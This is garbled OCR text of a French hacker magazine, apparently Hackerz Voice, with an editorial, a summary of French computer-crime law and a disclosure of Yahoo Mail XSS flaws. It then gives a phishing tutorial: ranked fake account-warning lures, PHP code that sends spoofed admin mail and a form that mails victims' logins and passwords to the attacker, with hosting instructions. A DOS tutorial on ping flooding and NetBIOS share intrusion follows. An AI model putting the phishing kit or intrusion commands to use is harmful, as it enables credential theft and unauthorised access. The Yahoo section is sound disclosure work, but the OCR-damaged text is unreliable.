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IS 

comme : cernent tous ceux qui se sentent. re 
a des idées ‘simples comme la liberté de s' ‘exprimer, a LE 
prendre, de comprendre... 

Ces lois, qu'il nous faudra respecter, sont en train des! éla- 
borer sans nous. Ce n'est pas normal. Pourquoi ? Parce 
qu'auparavant, on ne nous connaissait pas. Ou alors on 
nous connaissait mal : on nous prenait pour des bad pirates, 
et surtout ça arrangeait tout le monde. Sous prétexte de lutte 
anti-piratage, onérouillait un peu plus lés.libertés publiques. 
On faisait peur au citoyen en agitant comme.un épouvantail 
l'image dumméchant hacker qui peut s'introduire.sur n'importe 
quel système. Ca, c'était avant. Aujourd'hui, le travail de 
fond que nous avons engagé depuis un an commence à 
porter Ses fruits. Llimage des hackers et du‘hacking chan- 
ge. Desrepères ont été déplacés. Quand nous révélons des 
failles dans des systèmes, comme sur Yahoo dañs ce numé- 
ro, nous Considérons en effet quesmnous rendons service à 
tout.le monde : aux utilisateurs de ces systèmes d'abord, qui 
ont letdroit d'être informé, aux fournisseurs de ces technolo- 
gies ensuite, à qui on apprend quelque chose,.mais surtout 
à l'ensemble des citoyens; qui doivent savoir que la fragilité 
fait partiede ce monde, même lorsqu'il s'agit demuültinatio- 
nales réputées surpuissantes. Dañs cet esprit nous soute- 
nons toute publication.ettoute initiative, en France et dans le 
monde, qui partagerait avec nous cetteVision des choses. D'ores 
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En France, l’arme principale de l’arsenal juridique disponible contre 
les hackers demeure la loi Godfrain du 5 janvier 1988 « relative 
à la fraude informatique «. ce texte prévoir notamment que « 
l'accès et le maintien frauduleux total ou partiel dans tout ou 
partie d’un système ou délit d’intrusion est puni par l’article 
323-1 d'un an d'emprisonnement et de 100 000 francs d’amen- 
de «. Ce délit est constitué dès lors que n'importe quelle tech- 
nique est employée pour accéder frauduleusement à un système 
protégé. Il l’est aussi dans le cas de l’utilisation d’un code 


La loi prévoit aussi que si l’accès ou le maintien frauduleux 
dans le système entraîne la suppression ou la modification de 
données, ou même une simple altération, même involontaire 
ou par maladresse, les peines sont doublées. 


Lorsque l’action est volontaire, l’article 323-2 prévoit 3 ans 
d'emprisonnement et 300 000 francs d'amende. Là encore, la 
loi texte vise tous les procédés et toutes les techniques utili- 

sées, même celles inconnues au moment de la rédaction de la 
loi. Cette disposition vise aussi la propagation de virus infor- 
matique. 


Abonnement 


Ce que dit la loi en France 
« l'accès et le maintien frauduleux total ou partiel 
dans tout ou partie d'un système ou délit d'intrusion. 
est puni par l'article 323-1 d'un an d'emprisonne- 
ment et de 100 000 francs d'amende ». 


Il faut savoir que la simple tentative, non suivie de réussite 
d'accès exact, mais par une personne non autorisée à l'utiliser. 


tions, peuventelles aussi être déclarées responsables pénalement 





donc, est punie des mêmes peines. En outre, les personnes 
physiques coupables d'un de ces détits encourent, en plus de la 
peine principale, des peines complémentaires énumérées à 
l’article 323-5. 


Les personnes morales, comme les entreprises ou les associa- 


et encourent les peines prévues à l’article 131-39 du nouveau 
code pénal. 


Recevez chez vous LES MANUELS D'HACKERZ VOICE, 
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A l'heure où vous lirez ces 
lignes, les failles que nous 
avons trouvées auront-elles 
été colmatées ? 


Nous avons identifié plusieurs trous béants de securité dans Yahoo mail, permetant 
de pirater les courriers électroniques des utilisateurs de ce service. 

Nous avons prévenu Yahoo le 28 novembre dernier en leur expliquant la nature des 
failles que nous avions décelé, et que nous expliquons ici. 

Nous n'avons pas été pris au serieux. À l'heure ou vous lirez ces lignes, ces failles 
auront elles été colmatées? Nous l'espérons. De notre coté, nous tenons toujours 
a la disposition de Yahoo, gratuitement cela va sans dire, toutes les informations concer- 
nant ces trous de securité à l'échelle mondiale que nous avons identifiés. 


Yahoo est l'un des plus gros fournisseur au monde de services de 
consultation de courrier électronique par un navigateur web ("web- 


mail"). Présente dans le monde entier, cette multinationale a 


diversifié ses activités et s'oriente vers le e-business. 

De nombreuses failles de sécurité ont été trouvées dans le passé 
sur l'autre mastodonte du webmail qu'est Hotmail (de Micro- 
soft). Ce dernier jouit d'une mauvaise réputation à cause de ces 
vulnérabilités. Pourtant certaines d'entre elles s'appliquaient 
également à Yahoo, mais cela n'était pas vraiment mis en valeur. 
Cherchez "hotmail security hole"et"'yahoosecurity hole"sur google 
et vous verrez la différence en nombre de résultats. 

Je me suis interrogé sur le niveau de sécurité de Yahoo, pour 
savoir ce qu'il en était vraiment. 


J'ai donc commencé un audit (gratuit, je suis trop bon ;) dusite : 
mail.yahoo.com. Pour rester dans la légalité la plus complète, je me : 


suis intéressé uniquement à la sécurité du côté “client”, c'est-à- 
dire aux failles liées à ce qu'il se passe quand l'utilisateur du ser- 
vice lit ses mails avec son navigateur web. J'ai donc laissé de côté 
la question du niveau de résistance aux intrusions des serveurs de 
yahoo.com. 


i La problématique de la sécurité 
des webmalils 


Lors de la consultation d'un service webmail, quel qu'il soit, les 
pages affichées par le navigateur de l' utilisateur contiennent des 
données venant de sources extérieures, comme le texte des cour- 
riers électroniques reçus. Ces données peuvent contenir ducodehos- 
tile, quiest interprété par lenavigateur, en particulier du javascript. 

Ce code pourrait profiter d'un bug du navigateur pour implan- 
ter un virus ou un cheval de Troie dans l'ordinateur. Il peut aussi 
induireen erreur l'utilisateur (affichage d'une pagesimulant le vrai 
site maissituéesur unautreserveur, etc.) pour leforcer à transmettre 
des informations, comme son mot de passe, à une tierce partie 
(l'ordinateur d'un pirate). Il peut également manipulér automa- 
tiquement la boîte mail : détruire des messages, les lire, les 
envoyer, modifier les préférences de l'utilisateur, etc. 


Cécodepeutaussi tirer profit du fait qu'ilest contenu dans une page 
web du site visité pour demander au navigateur de lui trans- 
mettre le cookie d'authentification de la session, et l'envoyer via 
Internet à un script CGI placé sur un serveur public par un pira- 
te. Cescriptpeutalorsutiliser le cookie pour accéder à la boîte mail 


. dela victimesans avoir besoin de connaître son mot de passe, et peut 


récupérer automatiquement tous les mails qui ysont contenus. Cela 
n'est possible ques'iln'y a pas de vérification par leserveur de l'adres- 
se IP de l'ordinateur qui y accède : malheureusement, rares sont 
les webmails qui effectuent cette vérification. Il semble en parti- 
culier que Yahoo ne la réalise pas. 
Tout le problème de la sécurité des sites webmails est donc de fil- 
trer les données contenues dans les courriers électroniques pour 
en extraire le code potentiellement hostile, ou le transformer de 
maniere à modifier le moins possible le contenu, tout en le ren- 
dant inoffensif, Il est difficile de mettre en place un bon filtrage, 
car chaque nouvelle version des navigateurs web intégre de nou- 
velles fonctionnalités qui peuvent être utilisées à mauvais 
escient. De plus, les navigateurs réagissent tous différemment à 
une même page web : certains essaient de corriger automatiquement 
des erreurs classiques dans le code HTML, certains tags sont 
spécifiques à un type de navigateur, etc. Bref, c'est assez délicat. 
Des problèmes structuraux sont également à prendre en compte 
dans la conception d'un système webmail: le traitement des 
pièces jointes (qui peuvent aussi contenir du code hostile), la 
bonne différenciation entre zone de lecture du courrier et zone 
de gestion du courrier pour éviter les méprises (clicsur un faux bou- 
on "répondre" contenu dans le mail), etc. 


il Première vulnérabilité : une faille dans 
le dispositif de filtrage 





Lors de la lecture d'un message reçu au format HTML, 1] suffi- 
sait que l'utilisateur clique sur un lien spécialement construit 
pour que le lien s'ouvre dans la même fenêtre, ou pour que du 
code javascript hostile s'exécute. Est-ce un gros problème ? Oui, 
car si la plupart des personnes savent maintenant qu'il ne faut 
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pas cliquer sur des pièces jointes (même envoyées par des connais- 
sances), elles nese doutent pas quecliquer sur un lien apparemment 
innocent peut être aussi fatal. 

Même en ayant le javascript désactivé, on peut imaginer un mes- 
sage semblant provenir du support technique de Yahoo, quideman- 
de à l'utilisateur de mettre à jour les informations de son compte 
pour uneraison quelconque. Le lien ferait ouvrir une fenêtre deman- 
dant le mot de passe, en tous points semblable à celle que Yahoo 


affiche quand on veut accéder à ses informations personnelles . 


dans le menu Options. Il y a quelques mois, un mail de ce type a 
cireulé sur le site et a trompé un pourcentage important de per- 
SOnnes sn. 
Pour cette raison, si un lien est contenu dans un mail, lors de 
l'affichage du message le serveur Yahoo rajoute automatique- 
ment un paramètre target="_blank", ce qui oblige le lien à être 
ouvert dans une nouvelle fenêtre. 
Ainsi: 

<a HPeE=" HDMI > 
devient: | | 
<a hret="htip/Annxx.yy" target=" | hant> | 


Maisil yavaitunefaille:sionintroduit un paramètresupplémentaire 
dont la valeur contientunsigne ">", cela trompe lesystème de Yahoo 
qui interprète ce signe comme lafin du tag <a > et rajoute 
alors le href="_blank”. 

Ainsi: 
<ahret="httn//Anmaaonyy" truc="machin>"|ien</a> 
. devient: 
<a hret="htg/Amer. y" truc="machin target="_hlank”>"lien</a> 


Le navigateur de l'utilisateur voit donc un lien vers le site 
http:s/www.xxx.yy, aveeunattribut truc= "machin target=" qu'il 
ignore puisqu'ilneconnaît pascenom d'attribut, etle texte_blank” 


quine devrait pas se retrouver. lämais qui estignoré également 


sans émettre d'erreur. Dans cet exemple, il apparaît un guillemet 
devanit le texte du lien, mais une petite astuce permet de s'en 


débarrasser (pour cela on peut faire intervenir un tag <MBn | 


toto="></rien>). Lorsque l'on clique sur un tel lien, 1l s'ouvre 
dans la même fenêtre... 


D'autre parts Yahoo filtre le mot-clé javascript" en le rempla- 
çant par java-scripthetensupprimantun ou deux caractères situés 
à la suite. Pour être certain de ne rien laisser passer, ce filtre est 

“très large: souvent, même sice mot doit apparaître dans le texte 
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du mail et non dans un tag HTML, le filtrage opère tout de 
même. Bien. Pourtant, ilexisteun cas où lemot-clé "javascript n'est 
pas filtré: c'est justement quand il est situé dans un lien ! En 
effet, l'exécution decode javascript dansunenouvelle fenêtre (_blank) 
ne permet pas de récupérer le cookie du domaine .yahoo.com, ni 
de manipuler la boîte mail, donc Yahoo l'autorise. 

En combinant ceci avec le bug que l'on a vu au-dessus, 1] était 
donc possible d'exécuter un code javascript dans la page de lec- 
ture du mail, après un chcsurlelien. 

Ainsi, un clic sur <a href="'javascript:alert(document.cookie)"> 
affiche à l'écran le contenu du cookie de session. Un autre code 
permet de le transmettre sur le serveur Internet d'un pirate. 

J'ai également écrit et testé (sur un compte à mot, faut-il le pré- 
ciser ?) un script qui supprime en quelques secondes tous les 
messages contenus dans la boîte de réception, puis vide automa- 
tiquement la poubelle, montrant ainsi les possibilités destruc- 
trices de ce type de problème. | 

Je suis disposé à le fournir au technicien de Yahoo France, que 
j'ai eu au téléphone durant deux heures le mercredi:26 novembre, 


sans parvenir à le convaincre de la portée du problème, et sans 


qu'ildaigne "déranger un ingénieur pour moi", neserait-ce que par 
mail (j'avais pourtant fourniunephoto d'écran probante, montrant 
l'affichage du cookie). 
Le concept de rajouter un signe supérieur dans un attribut pour 
tromper les filtres n'est pas nouveau: bien que dans un cadre un 
peu différent, il a été diffusé en février 2000 par Marc Slemko 
sur la liste vuln-dev, publiquement accessible sur Internet (voir 
les archives sur www.securityfocus.com), à propos du logiciel de 
webmail gratuit IMP ! Yahoo aurait-il quelque chose à apprendre 
du monde du logiciel libre ? Certainement, mais la réciproque 
est vraieaussi: j'aitrouvé des trous desécuritésur IMP quisontcor- 
rigés sur Yahoo. Mais au moins lorsque l'on regarde le code 
source de IMP on voit que les programmeurs sont au courant 
puisqu'ils annoncent "ces filtres ne sont pas parfaits, regarder 
les mails en HTML est une très mauvaise idée". Et ils ont bien 
raison: mes recherches montrent que quel que soit le webmail 
que vous utilisez, le filtre parfait n'a pas encore été invente ! 


ill Deuxième vulnérabilité: “cross-site scrip- 
ting" ou le retour du fils de la vengance du 
>/textarea< 
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Lors del'affichage d'un texte dansunezone de texte, les tags HTML 
qui y sont éventuellemenñt contenus (comme <b>, <img>, 
etc...) ne sont pas interprétés par le navigateur. Beaucoup de 
développeurs d'applications web pensent, à tort, que tout ce 
qu'il peuvent mettre entre les tags <textarea> et </téxtarea> 
(qui délimitent la zone de texte) sera ignoré par le navigateur. 
Cela est vrai. à l'exception du tag de commentaire <!--, et sur- 
tout du tag </extares> ! 
Ainsi, si les caractères spéciaux comme < et > ne sont pas trans- 
formés en leurs équivalents hml (appelés entités: &lt; et &gt:), 
l'insertion dans une zone de texte d'un contenu comme: 
| 
</lexarea> 
<soript Language=davascripti.1>alert(document. cookie) </ Script> 


va fermer la zone de texte et insérer le script dans la page: ce 
dernier sera donc exécuté. (voir le Hackerz Voice 7 pour une dis- 
cussion plus détaillée, à propos d'une faille identique touchant 
d'autres webmails) 


Or dans le domaine mail.yahoo.com, plusieurs pages (comme la 
page de composition d'un message) étaient vulnérables à ce type 
d'attaque, que l'on appelle plus généralement "cross-sitescripting”. 
C'est le fait que l'utilisateur puisse insérer “lui-même”* du script dans 
la page d'un site. Ça paraît innocent: quel intérêt pour l'utilisa- 
teur de se pirater lui même ? C'est pourquoi de nombreux sites 
ne sont pas protégés contre cela. Pourtant, c'est extrêmement 


dangereux: si l'utilisateur clique sur un lien convenable contenu 


dans un mail, du type hltp://mail.yahoo.com/compose? body=</texta- 
rea><script>...</Schipt>, 1] va ouvrir une page contenue dans Île 
domaine mail.yahoo.com, dans laquelle sera contenu du javas- 
cript ! Je pense que vous avez compris le problème... D'autant 
plus que le lien est situé dans un domaine auquel l' utilisateur 
fait confiance, 1l aura donc tendance à cliquer dessus plus facile- 
ment. Cela peut donc fonctionner même si le message est en texte 
seul. Dans un message en HTML; passer les filtres est facile en 
encodant l'url. 


En l'an 2000, le CERT et Microsoft ont publié un "advisorÿ" 
sur ce thème, et un exemple de la faille </textarea> avait été 
détecté la même année. Sur yahoo.com, d'autres problèmes de cross- 
site scripting avaient été découverts par mparcens 1l y a six mois, 
et corrigés. 
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IV C'est tout ? 


Hum, heu. Les failles que j'ai signalées peuvent être corrigés 
assez facilement, avant la parution du journal. J'espère que c'est 
le cas ! (voir sur www.dmpfrance.com pour en être sur). Il existe 
cependant d'autres trous de sécurité sur Yahoo! Mail, lesquels, 
utilisés éventuellement en combinaison avec les précédents, per- 


mettent à un individu mal intentionné de manipuler complète- 


ment la boîte mail de l'utilisateur sans que celui-ci n'ait besoin 
de cliquer sur un lien situé dans un message. Mais ce sera pour la 
prochaine fois. laissons à l'équipe de Yahoo le temps de se 
retourner. 
Et puis, ce style de problème est tellement répandu que je ne pré- 
fère pas en parler maintenant: J'enjoins les développeurs d'appli- 
cations web soucieux de sécurité de m'envoyer leur clé PGP certifiée 
pour que je leur transmette un document technique recensant les 
vulnérabilités connues du "côté client", avant publication de ce 
document dans le Hackerz Voice 8. J'ai pu trouver une faille 
importante dans chaque webmail auquel je me suis intéressé 
(une dizaine à ce jour, du plus petit au plus gros), il y a donc 
trop de sociétés concernées pour que Je puisse toutes les contac- 
ter de moi-même, sachant que la recherche d'une adresse de 
contact valable est souvent ardue (on tombe sur une hotline). 


V Alors, Yahoo négliige-t-il la sécurité et la 
protection de la vie privée? 


Non, pas exactement.Ils font un’effort important de filtrage du 
contenu des mails en HTML, et demandent à l'utilisateur de 
retaper son mot de passe avant de pouvoir accéder aux informations 
confidentielles du compte, ce quiestuneexcellenteidée. Unsystème 
a été également mis en place pour limiter le risque que quel- 
qu'un rajoute une adresse de transfert des messages. Ces disposi- 
tifs permettent de liniter l'impact que peut avoir l'exécution de 
javascript sur une page, à condition que l'utilisateur de se laisse 
pas abuser et ne fournisse pas son mot de passe. 

Néanmoins, on peut regretter que leur politique en matière desécu- 
rité soit attentiste: au lieu de chercher eux-même les vulnérabili- 


tés, ilssemblent attendre que d'autres personnes les leur signale pour 


les corriger ensuite. Jen'explique pasautrement lefait que du cross- 
site scripting soit encore possible sur certaines pages alors que le 
problème avaitétésoulevésur d'autres pages de yahoo:1ly asix MOIS, 


même si la méthode utilisée était differente. 
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FAIRE UN FAKE MAIL SDIS-MÊME 


Recette Hackerz voice numéro 12 025 his 








DISCLAIMER | | he ss 1. 

L'ARTICLE CI-DESSOUS A POUR BUT DE VOUS [logo du serveur] 3 

nr cl id ve nes ; SUITEAUN GRAVE PROBLEME SUR LE SERVEUR, VOTRE COMPTE RISQUEDE NE PLUS ETRE 
£ 4 RECONNU. VOUS N'Y AUREZ DONC PLUS ACCES. 

ET PÉRILS. NIMOI, NIHACKERZ VOICENESERONT | 

RESPONSABLES DE CE QUE VOUS ALLEZ FAIRE POUR Y REMEDIER, VEUILLEZ REACTUALISER LES DONNEES DE VOTRE COMPTE EN 


AVEC CET ARTICLE. REMPLISSANT LE FORMULAIRE CI-DESSOUS. 





SI VOUS SOUHAITEZ CHANGER DE SERVEUR MAIL,NE REMPLISSEZ PAS LES CHAMPS 
CI-DESSOUS ET VOTRE COMPTE SERA TOTALEMENT DETRUIT. 


I: Quesce qu'un fake mail 


Merci de votre compréhension. 





Les fakes mail, ça doit vous dire quelquechose. En effet, on en a Cordialement. 
déjà parlé dans un manuel mais, je voulais fairéun article dessus L'équipe [serveur] 
Carac'est une pure technique Qui, à mon avis, peut donner de très 

Mius \: NOTE: 5/10 
Pourles petits newbies, je vais quand même expliquer ce qu'est 

un fake mail... FAKE MAIL 2. 
C'est un e-mail que l'on enyotanonymement et, ou on se fait pas- [logo du serveur] 


ser poufün ädminafin d'obtenir le password d'un compte. 
SET P P P 


en” gr POUR DES RAISONS D'ACTUALISATION, VOUS DEVEZ REMPLIR LE FORMULAIRE CI 
1 Que.contient un fake malt ? pssousAANDEPOUVOIR CONTINUER À ACCEDER À VOTRE COMPTE | 


Les fakes mail contiennentven.général, un petit texte, expliquant Merci de votre compréhension. 
que le comptedeila victime va être détruit pour des raisons par- Cent 
ticulièreset, un formulaire demandantä la victimeson login, etbien Téine (serveur! 
sur, son PASS. 2 
J'ai fait, ci-dessous, un récapitulatif de différents texte de fake 
ES | NOTE: 4/10 
que j'ai testé et que je note sur 10 











FAKE MAIL 3 


[logo du serveur] 


COMMEVOUS LE SAVEZ PEUT-ETRE, NOUS AVONS DEPUIS QUELQUES SEMAINES DES PRO- 
BLEMES DE TYPE BIOS-B5 SUR NOTRE SERVEUR. LA TOTALITE DES COMPTES VA DIS- 
PARAITRE. | 


POUR EVITER CELA, VEUILLEZ REMPLIR LE FORMULAIRE CI-DESSOUS AFIN DE REAC- 
TUALISER VOS DONNEES AUPRES DU SERVEUR. 


Merci de votre compréhension. 
Cordialement. 
L'équipe [serveur] 


NOTE : 8/10 
FAKE MAIL 4 


[logo du serveur] 





NOTRESERVEUR A ETEPENETRER PAR DES PIRATES QUELQUES DONNEES ON ETE ENDOM- 
MAGÉS ET, VOUS DEVEZ REMPLIR LE FORMULAIRE CI-DESSOUS AFIN DE LES REAC- 
TUALISER. 


Merci de votre compréhension. 
Cordialement. | 
L'équipe [serveur] 


NOTE : 2/10 





Comme vous le voyez, les résultats peuvent être très surprenants. 
Je vous conseille donc le Fake n° 3 qui a rapporté à une mauvaise 
connaissance 6 passwordssur 10 fakes envoyésce quiestexceptionnel. 


lille COMMENT FAIRE SOIT-MEME 
SON FAKE MAIL 


Je vais vous expliquer ci-dessous comment faire vous-même votre 
fake-mailer en PHP 

Cela n'a rien de très compliqué. L'explication va être très 
détaillée de façon à ce que n'importe qui puisse le faire. 


SA S'TRUCTURE MRELÉE, TOTALEMENT Ÿ 
OÉLOCALISÉE, NoUS PERMET D'Y 
RÉNÉTRER SANS ÊTRE REPÉRES 


[eAR LES FO.N. 
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Voici le code. 


<1 

Sheaders = "From:champi\n"; 

Sheaders = "Content-Type: text/html; charsel=iso-8859-1\n"; 
Stext.="champ?"; 

mall('champa", “champ4", "Stext", "Sheaders"): 

1> 


CHAMP ! : Adresse d'expédition 
CHAMP 2 : Message 

CHAMP 3 : Adresse mail de la victime 
CHAMP 4 : Objet du message 


Pour le champ 1, le mieux est de mettre "Admin(@serveur.com". 
Pour le champ 2, vous mettez le texte du fake au format HTML 
(voir ci-dessous et ci-dessus ). 

Pour le champ 3, vous mettez l'adresse e-mail de la victime sous 


: Ja forme login(@serveur.com 
- Pour le champ 4, le mieux est de mettre "Probleme sur votre 


compte". 


ATTENTION AUX ACCENTS : Surtout, ne pas mettre d'ac- 


cent car php vous fera un gros bug srl trouve un accent ! 


Vous savez maintenant envoyer un e-mail en php. Nous allons 
voir comment intégrer le formulaire. 
Voici le code à insérer pour le formulaire. 


<form method=post action=champi> 
Login: 
<input type=text name=10gin> 

Mot de passe: 

<input type=passWord name=pass> 
<input type=submit value=Envoyer> 
</FIRM> 


_ Pour pouvoir envoyer les mails, 11 va falloir vous créer votre 


propre Compte chez un hébergeur qui gère le php et quine. 
bloque pas la commande mail(). In'y en à qu'1, c'est multimania.com. 
Allez donc vous créer un compte multimania, ça prend 3 minutes 
et c'est gratuit. 
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Une fois ce compte créé, dans lechampl, vous allez mettre :: 
http://votre_login.multimania.com/formulaire.php 

Nous verront plus bas ce que vousallezmettre dans formulaire.php. 

Pour le format html, ceux qui ne font pas de html, ne vous tra- 

cassez pas, je vous mets un listening complet plus bas. 

Reprenons notre code avec toutes les modifications et le texte 

n°3. Nous prenons comme exemple un compte caramail. 


<? 

Shealers = “From:admin@caramail.com\n"; 

“ah = "Content-Type: text/html; charset=is0-8858-1\n"; 

U px =" 

<center><ing sre="champl"> <br> <font face=arial> 
COMME VOUS LE SAVEZPEUT-ETRE, NOUS AVONS <br> 
DEPUIS QUELQUES SEMAINES DES PROBLEMES DE TYPEDOS-B5<hr> SUR NOTRE 
SERVEUR. LA TOTALITE DES COMPTES VA DISPARAITRE.<hr><hr> 


POUR EVITER CELA, VEUILLEZ REMPLIR LE FORMULAIRE CI-DESSOUS <br> 
AFIN DE REACTUALISER VOS DONNEES AUPRES DU SERVEUR. <br></center> 


Merci de votre compréhension. <br> 
Cordialement. <br> 
&nbsp:&nbsp:&nbsp:&nhsp;L'équipe Caramail<br> 


<orm method=post action=http://votre_ login multimania.com/formulaire.php> 
Login: 
<input type=textname=logi> , 
Mot de passe: re 
<input type=password name=pass> 
<input type=submit value=Envoyer> 

. </FRM>"; 


mal victime@caranalLeom", “Votre compte ades problemes", "Stet", "Shearers") 
echo “ca y est Le Fake Mall été envoyé à la victime !" 
> , 
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Et voilà. Vous recopiez le listening ci-dessus dans notepad et 
vous nommez le fichier index.php_ : | 

Autre chose, dans champ, il faut mettre l'url du logo de cara- 
mail. Je vous laisse le trouver vous-même, c'est pas très compli- 
qué. 

Il ne nous reste plus qu'à créer le fichier formulaire. php ! 

Nous allons donc le faire. Le voici, ci-dessous. 


<1 

maillvotreadressee-mail", “Le fake mail a marché !"," Bravo L Ton fake a marché | 
Le login dela victime est Slogin et le mot de passe du compte est Spass !”, “From: 
pass @hav.com"); 

echo "Merci. Vos données on été actualiser avec Succès." 

> 


Voilà. Et ça vous renvoie la login et le pass dans votre boîte d'e- 
mail. Pareil, vous recopiez le listening ci-dessous dans notepad 
et vous le nommez formulaire.php 


Vous avez les 2 fichiers. Votre fake est presque fin. Vous n'avez 
plus qu'à mettre les 2 fichiers sur votre compte multimania. Ca, 
si vous ne savez pas faire, je ne peux rien pour vous ! 


Sivoussouhaitezenvoyer plusieurs fakes, ilsuffit de changer l'adres- 
see-mail de la victimeet deremettresur multimania la pageindex.php. 


IVe CONCLUSION 


Ben voila. Un article complet (enfin, je crois). C'est mon premier 
article pour hzv mais ce n'est sûrement pas le dernier. 

Si vous avez des problèmes, questions, suggestions, insultes, n'hé- 
sitez pas >>>> bipeurs@hotmail.com 

@+ 
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© UNHACKSOUS DOS 


Et oui ! 

même de simples 
commandes DOS 
peuvent se reveler 
utiles aux hackerz 


Le DOS est une mine d’or pour djeunz hackeurZ... et comme le 
demandait Animu dans le Manuel #2 voilà enfin un article pour 
les newbies de chez newbies :) 








Voici les principales commandes utiles aux attaques par DOS (à 
ne pas confondre avec l’attaque DoS : DenialofService qui est un 


- plantage de l'OS distant) avec exemples et shémas à l'appui : 


Le Ping : 


Nom de la commande : Nig 


@:Le ping sert à convertir le nom d’hôte ou l’url d’un site en 1p, 

. à obtenir des infos sur un serveur désiré (souvent voire tou- 
jours utile et indispensable avant l’attaque de SON site) et à 
tester le temps de réponse d’un serveur. 


Exemple : C\WINDOWS>ping www.dmpfrance.com 


Envoi d'une reguête ‘ping’ sur wwwimpfrance.com [212.43.196.187] avec 32 octets 
le données : 


SF V NY 





Réponse de 212.43.198.167 : octets=32 temps=142 ms TTL=240 
Réponse de 212.43.196.187 : octets=32 temps=141 ms TTL—=240 
Réponse de 212.43.196.187 : octets=32 temps=139 ms TTL=240 
Réponse de 212.43.196.167 : octets=32 temps=144 ms TTL=240 


Statistiques Ping pour 212.43.196.167 : Ë 
Paquets : envoyés = 4, reçus = 4, perdus = 0 (perte 0%), 
Durée approximative des boucles en mili— secondes: 
minimum = 139ms, maximum = 144ms, moyenne = 141ms 


© La commande ‘ping’ a une autre fonction : le ping overflood 
(ou flood ping). Cette fonction du ping sert à rebooter l'ordi 
du mec qui vous attaque. Je l’ai appris à ma mère et quand 1l y a 
"le petit H qui clignote" (le firewall). attention à vous ;°) hé 
hé 
La commande à entrer est : ping—nnbr_de_packets ip.de.la.cible 


Exemple : C\WINDOWS>ping —n 85000 172.180.178.24 // j'ai mis 65000 


mais faut en mettre suffisamment pour faire rebooter la machine 


attaquante (ou la votre ! car ilest strictement interdit de faire 
justice sois même ;) 


Envoi d'une reguête ‘ping’ 172.190.178.24 avec 32 octets de données : //no panick ! 
| _ c'estmonip 
Réponse de 172.190.178.24 : octets=32 temps<10ms TTL=128 
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL—128 
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128 
Réponse de 172.190.176.24 : octets=32 temps<10ms TTL=128 
Réponse de 172.190.178.24 : octets=32 temns<10ms TTL=128 


[...] 

Réponse de 172.190.178.24 : octels=32 temps<10ms TTL=128 

Réponse de 172.190.176.24 : octets=32 temps<10ms. TTL=128 … 

Réponse de 172.190.178.24 : octets=32 temps<10ms TTL=128 //J'ai rac- 

| s courci de 

quelques 
milliers de 
ignes… 
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Statistiques Ping pour 212.43.196.187 : 
Paquets : envoyés = 45831, reçus = 12583, perdus = 23088 [...] 


Pour arrêter le flood faites Ctrl+C 


® Etdernièrefonctionutile pour nous: l’oversize packet déjà abor- 
dé dans hackerz voice #2, ee 

La commande à entrer est : ping —{ taille dans taille rentrer la taille 

du paquet à envoyer comprise entre 0 et 65000 (la plus grosse 

possible bien sur ;) 


Exemple :Æ:\WINDOWS>ping —1 84510 www.lesite.com 


Malheureusement pour nous et heureusement pour les admins, 
presque tous les serveurs Sont protégés et vous recevrez une mes- 
sage detimeoutcommequoïledélai d’attenteautoriséest dépasse 


Net view : 

Nom de commande : net view nom _ d'ordi 

La commande net view sert à voir les ressources partagées d’un 
ordi avant une attaque NetBIOS (voir plus loin) 


Exemple : C\WINDOWS>net view \\ GASBF2 


Net use : | 

Nom de commande : net use \nom_d'ordNettre_de_partition 
Lacommande net use sert à se connecter au répertoire d'une res- 
source partagé sans pass. Son utilité la plus fréquente est dans les 
attaques NetBIOS pourse Connecter au répertoire windows en 
mettant c$ à la place de la lettre de la partition (voir plus loin). 
Exemple : C\WINDOWS>net use \\ GASBF2\I 


Le statistic NetBlOS over TCP/IP : 


Nom de commande : nbtstat | 

L'attaque par NetBiosest une intrusion en règle qui sert à ren- 
trerdans un ordi qui a des fichiers partagés (c’est un exploît Net- 
BIOS quoi). 

La commande à entrer est : nbtstat A 1p.du.pigeon 


Exemple : C\WINDOWS>nhtstat —A172.188.68.214 // c'est aussi mon 1p 
mais j'ai modifié le nom d'ordi (pas fou !) 





 Ipaie.lacible 


NetBIOS Remote Machine Name Table 


Name : “Tyne Stalus 

G4S9F2 <20> UNIQUE Registred 
WORKGROUP : <00> GROUP Registred 
G4S9F2 <03> UNIQUE Registred 


MAG Adress = 44 — 45 — 53 — 54 — 00 — 00 


La ligne "GAS9F2 <20> UNIQUE  Registred” nous intéresse car elle 
possède le nom d’ordi(G4S9F2)et la valeur <20> qui veut direque 
l'hôte possède des fichiers partagé et donc que l'attaque va être 
possible. 


Il faut maintenant modifier le DOS en entrant la ligne edit Imhost 
pour entrer dans l'éditeur de DOS puis taper les commandes : 


nom_de_lordi #PRE 
Donc pour l'exemple de mon ordi : 
172.188.66.214 C4S89F2 #PRE 


Faites Fichier >Enregistrer puis Fichiers>Quitter pour revenirau DOS. 
Tapez ensuite la commande : nhtstat -R 

Vous obtenez alors : Successlull purge and preload of the NBT Remote Cache Name 
Table puis l'inventaire des ressources partagées (a,c.d..….). 

Entrez alors la commande : net view \\nom_d'ordl 


Donc pour notre exemple : C\WINDOWS:>net view \\ 6458F2 


Vousobtenezalorsl’inventaire des ressources partagées (a.c,d,e.….) 
Entrez ensuite : netuse \iom_d'ordiX \\ X étant la lettre de partion 
à laquelle on veut accéder. 

Puis pour accéder au répertoire vindaube (qui donnera donc 
accès au disque dur distant), remplacez le X par c$ 

Ca y est j'ai pris le contrôle de mon ordi :) 


Les connexions actives : 

Nom de commande : netstat -n 

La commande Netstat sert à voir toutesconnections actives vers votre 
ordi sous la forme : 


Proto Adresse locale Adresse distante Etat 


NX ZZEAMENE 
PL 1544 = 
ve / 
ur : 


F4 
Nez. 3 3 
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Maisl’utilitépour vadoncêtredetrouveruneipsuricq.Benouélemec 
avec qui vous parlez est en connection active avec l’icq de votre ordi. 


Pour choper l’ip de votre pote sur icq faut d’abord qu’il soit 
connecté à icq (logique). Bon quand vous voyez votre pote 
connecté à icq, éteignez votre 1cq et entrez (dans le DOS) la com- 
mande :Netstat—1 puis rallumez S5min après votreicqetenvoyezun mes- 
sage à votre pote. Ensuite y a plus qu’à refaire netstat—1 et une 1p à 
du apparaître avec un port du genre 5190 ou 5191 (y en a plein 
mais c’est les plus courants). Son ip apparaîtra dans la partie 
Adresse distante sous la forme 172.183.68.46 : 5190 (décidé- 
ment ces zaoliens y sont partout) 


Le protocole FTP : 


Nom de commande utile : ftp —n et plein d’autres. 


Voyons comment hacker par FTP. Mais ne vous faites pas d’illu- 
sions cette technique ne marche à peu près que sur | serveur sur 
